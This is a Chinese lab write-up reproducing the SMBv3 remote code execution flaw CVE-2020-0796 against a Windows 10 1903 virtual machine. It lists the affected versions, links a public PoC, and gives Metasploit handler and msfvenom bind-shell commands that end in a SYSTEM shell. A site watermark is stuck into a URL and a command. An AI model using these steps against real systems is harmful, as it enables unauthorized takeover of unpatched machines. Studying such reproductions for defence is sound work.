一、漏洞原理
该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。
二、影响版本
适用于32位系统的Windows 10版本1903
Windows 10 1903版(用于基于x64的系统)
Windows 10 1903版(用于基于ARM64的系统)
Windows Server 1903版(服务器核心安装)
适用于32位系统的Windows 10版本1909
Windows 10版本1909(用于基于x64的系统)
Windows 10 1909版(用于基于ARM64的系统)
Windows Server版本1909(服务器核心安装)
三、复现环境
靶机:win10_1903 IP:192.168.123.47
攻击机:kali IP:192.168.123.30
exp:https://github.com/dacade/CVE-POC/tree/master/CVE-2020-0796讯享网
四、复现过程
先在kali里开msf监听(exp后shell会反弹到监听窗口)
这里我们使用模块
讯享网use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp
然后把对应参数设置好就行了
需要注意的是,我们使用的监听端口是3333,这是因为POC里指定的port是3333,如果要使用别的端口,可以用msf生成其他端口的shellcode。
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt然后将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD即可。
在开了监听后,可以直接执行POC了
然后任意按键就能退出exp,然后回到监听窗口就能拿到shell
而且直接就是system权限
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/52849.html